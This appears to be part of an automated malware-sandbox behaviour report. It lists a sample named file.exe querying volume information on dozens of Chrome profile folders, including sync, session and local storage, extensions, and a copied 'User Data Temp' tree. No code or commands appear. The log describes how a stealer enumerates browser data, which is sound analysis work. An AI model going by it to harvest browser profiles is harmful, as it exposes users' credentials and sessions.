Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationGuidePredictionModels VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\segmentation_platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\AutofillStates VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CommerceHeuristics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Crowd Deny VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PersistentOriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Extension Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FirstPartySetsPreloaded VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\MEIPreload VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OptimizationGuidePredictionModels VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OptimizationHints VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\SSLErrorAssistant VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\SafetyTips VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\ThirdPartyModuleList64 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\TrustTokenKeyCommitments VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\WidevineCdm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\pnacl VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\segmentation_platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\AutofillStates VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CommerceHeuristics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Crowd Deny VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PersistentOriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Extension Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\commerce_subscription_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\coupon_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\FirstPartySetsPreloaded VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OptimizationGuidePredictionModels VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\OptimizationHints VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\PKIMetadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\SafetyTips VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\ThirdPartyModuleList64 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\TrustTokenKeyCommitments VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\WidevineCdm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\pnacl VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\segmentation_platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\AutofillStates VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CommerceHeuristics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Crowd Deny VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
